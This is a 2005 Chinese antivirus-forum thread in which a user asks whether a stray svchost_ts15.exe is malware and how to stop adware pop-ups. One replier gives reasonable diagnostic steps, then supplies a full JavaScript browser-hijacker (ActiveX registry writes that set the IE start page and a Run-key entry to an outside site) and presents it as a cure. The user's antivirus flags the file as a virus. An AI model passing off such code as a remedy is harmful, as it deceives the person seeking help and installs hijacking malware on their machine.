瑞星卡卡安全论坛

首页 » 技术交流区 » 反病毒/反流氓软件论坛 » [求助]关于SVCHOST.EXE
htting - 2005-9-24 19:14:00
小弟的电脑在打开IE的时候,右下角总是有小广告弹出,用卡卡助手试了好多次都清除不掉。在系统配置程序的启动选项中,里面有一个SVCHOST_TS15的加载向,它的位置在c:\windows\svchost_ts15.exe小弟我不知道这个是什么东西,是病毒还是系统文件?但是别的文章都说svchost.exe这个文件只在SYSTEM32目录下。如果是病毒,请问怎么把它彻底删除干净!请高手指点迷津,小弟万分感谢!
curie-hu - 2005-9-24 19:17:00
Svchost本身只是作为服务宿主,并不实现任何服务功能,需要Svchost启动的服务以动态链接库形式实现,在安装这些服务时,把服务的可执行程序指向svchost,启动这些服务时由svchost调用相应服务的动态链接库来启动服务。
当Svchost
是病毒是,在任务管理器内它的cpu占用率高达100%.
htting - 2005-9-24 19:21:00
请问:Svchost_ts15.exe也是Svchost.exe的一种么?不用怀疑它是病毒么?那我IE右下角老是弹出广告怎么清楚?
天地随想 - 2005-9-24 19:26:00
我也是这样的 杀毒时 杀了63个svchost.exe
跟你那个还有少许不同
curie-hu - 2005-9-24 19:27:00
在“运行”对话框中输入“cmd”命令,然后在命令行模式中输入“tasklist /svc”命令,系统会自动列出服务列表,你也就可以轻松判断是否中毒了。
天地随想 - 2005-9-24 19:32:00
没有列表啊....
curie-hu - 2005-9-24 19:34:00
没输错吧?
天地随想 - 2005-9-24 19:35:00
/ \ 带空格 没空格 都用了  不行
htting - 2005-9-24 19:38:00
绝对没错啊,一个是在c:\windows\system32\svchost.exe还有个在c:\windows\svchost_ts15.exe。在CMD里输出的列表里我看不懂啊,不知道到底有没有中毒!
htting - 2005-9-24 19:41:00
还有就是IE右下角老是弹出小广告,卡卡助手又删不掉,何解?
curie-hu - 2005-9-24 19:42:00
使用的是WIN2000吗?
htting - 2005-9-24 19:43:00
WINXP SP2 PRO
htting - 2005-9-24 19:47:00
以前都好的,就前天被强制安装了DUDU和酷猴搜索以后就有小广告弹出。DUDU和酷猴我都已经卸载了。计划任务也删掉了,可还是有小广告不断的弹出,你不去点它的话,过个几秒钟它会自动消失,然后就周而复始的循环
curie-hu - 2005-9-24 19:47:00
在运行对话框中输入“regedit.exe”后回车,打开注册表编辑器,使用查找功能,找到“svchost项”,看看是不是“% systemroot%\system32\svchost.exe"。
htting - 2005-9-24 19:56:00
不是,它是值是C:\WINDOWS\svchost_ts015.exe
一个大肥子 - 2005-9-24 19:59:00
不用那么麻烦用3721上网助手或其它工具屏蔽所有可疑插件.
htting - 2005-9-24 20:02:00
给你看看我的注册表

附件: 5869822005924200259.BMP
curie-hu - 2005-9-24 20:19:00
不用3721
这样做:
在桌面下建立一个名字为test.html的文件,文件内容如下:

<SCRIPT language=JavaScript>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f(){
try
{
//ActiveX初始化过程(为达到修改用户注册表所必须的准备程序 )
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");< br>a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createI nstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createI nstance();
Net = a1.GetObject();
try
{
if (documents .cookies .indexOf("Chg") == -1)
//以下是检测用户注册表并修改相应的键值
{
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://JavaHouse.126.com/");//修改用户InternetExplorer浏览器的默认主页
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", "http://JavaHouse.126.com/");//建立默认启动页面程序,保证用户每次启动计算机首先打开该页 面
var expdate = new Date((new Date()).getTime() + (1));
documents .cookies ="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
}
}
catch(e)
{}
}
catch(e)
{}
}
function init()
{
setTimeout("f()", 1000);//实现打开页面后1秒钟内执行测试修改注册表的工作
}
init();</SCRIPT>
<!--End set start page -->
htting - 2005-9-24 20:26:00
我 晕,刚创建好,被瑞星发现是病毒,杀掉了~昏倒!!!
htting - 2005-9-24 20:26:00
兄弟啊,你不是耍着我玩的吧?
curie-hu - 2005-9-24 20:31:00
怎么会?
如果不行,使用超级兔子IE修复专家.
curie-hu - 2005-9-24 20:34:00
【回复“htting”的帖子】
这是当然了,上面的编程目的就是要禁用注册表中的某些项.
1
查看完整版本: [求助]关于SVCHOST.EXE
© 2000 - 2026 Rising Corp. Ltd.